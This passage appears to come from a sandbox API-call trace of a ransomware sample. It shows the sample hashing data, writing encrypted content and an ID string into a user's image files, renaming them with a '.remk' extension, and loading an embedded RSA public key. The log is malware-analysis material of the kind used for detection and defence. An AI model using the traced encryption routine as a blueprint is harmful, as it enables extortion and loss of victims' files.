dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0236.526] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0236.526] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0236.526] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0236.526] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0236.526] GetLastError () returned 0x0 [0236.526] CryptDestroyHash (hHash=0x31de170) returned 1 [0236.526] CryptReleaseContext (hProv=0x6951f0, dwFlags=0x0) returned 1 [0236.526] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.526] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0236.526] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0236.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.527] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0236.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x163b0) returned 0x37cf820 [0236.527] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0236.527] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0236.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0236.527] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cec70 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc780 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cecb8 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc798 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7c8 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc828 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0236.528] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1db0 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0236.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7c8 | out: hHeap=0x630000) returned 1 [0236.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0236.528] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc828 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc7e0 [0236.528] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0236.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bc7c8 [0236.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0236.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0236.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0236.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0236.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0236.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6c48 [0236.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0236.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0236.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7c8 | out: hHeap=0x630000) returned 1 [0236.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0236.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0236.529] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1db0 | out: hHeap=0x630000) returned 1 [0236.529] GetCurrentThreadId () returned 0x314 [0236.529] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0236.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c5d00 [0236.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0236.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6951f0 [0236.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0236.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.530] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0236.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0236.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.577] GetCurrentThreadId () returned 0x314 [0236.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0236.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.577] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0236.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0236.577] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0236.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x6a7330 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc828 [0236.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7c8 [0236.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0236.578] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0236.578] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7e0 [0236.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0236.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7b0 [0236.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc840 [0236.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0236.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc810 [0236.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7f8 [0236.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc858 [0236.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bc7f8 [0236.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc810 | out: hHeap=0x630000) returned 1 [0236.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0236.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0236.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0236.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0236.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0236.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7c8 | out: hHeap=0x630000) returned 1 [0236.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bc7c8 [0236.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0236.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0236.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc828 | out: hHeap=0x630000) returned 1 [0236.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0236.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc858 | out: hHeap=0x630000) returned 1 [0236.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0236.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0236.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0236.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0236.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0236.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7c8 | out: hHeap=0x630000) returned 1 [0236.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0236.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0236.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6951f0 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5d88 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f758 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7f8 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f778 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc840 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7e0 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc7b0 | out: hHeap=0x630000) returned 1 [0236.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bddc8 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8ac8 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bc798 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cecb8 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x6a7330 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0236.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0236.582] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x163ab, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x163ab, lpOverlapped=0x0) returned 1 [0236.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0236.583] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x163b0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.583] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0236.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0236.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0236.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0236.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0236.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0236.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0236.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0236.584] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0236.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0236.584] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0236.584] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0236.584] CloseHandle (hObject=0x640) returned 1 [0236.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0236.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e0) returned 0x37bd408 [0236.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0236.586] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\ogT6-r28SnPPl.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\ogt6-r28snppl.jpg"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\ogT6-r28SnPPl.jpg.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\ogt6-r28snppl.jpg.remk")) returned 1 [0236.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0236.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.587] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0236.589] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0236.589] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd41dd0c0, ftCreationTime.dwHighDateTime=0x1d5db2e, ftLastAccessTime.dwLowDateTime=0x3e5ea6a0, ftLastAccessTime.dwHighDateTime=0x1d5e163, ftLastWriteTime.dwLowDateTime=0x3e5ea6a0, ftLastWriteTime.dwHighDateTime=0x1d5e163, nFileSizeHigh=0x0, nFileSizeLow=0x14205, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="UxHea_1OLD4fGeysQVZ.png", cAlternateFileName="UXHEA_~1.PNG")) returned 1 [0236.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185d80 [0236.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x106) returned 0x31f6b30 [0236.589] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185d80 | out: hHeap=0x630000) returned 1 [0236.589] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\UxHea_1OLD4fGeysQVZ.png") returned=".png" [0236.589] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_dqq7i08G7zkmy4eWB\\4HUb e9qKHwuKHz-\\FzGfdyB6\\UxHea_1OLD4fGeysQVZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_dqq7i08g7zkmy4ewb\\4hub e9qkhwukhz-\\fzgfdyb6\\uxhea_1old4fgeysqvz.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0236.590] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=82437) returned 1 [0236.590] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0236.593] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x141df, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0236.593] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0236.595] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0236.595] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0236.595] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0236.595] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x14205, lpOverlapped=0x0) returned 1 [0236.596] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0236.596] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0236.596] lstrlenA (lpString="-----BEGIN PUBLIC 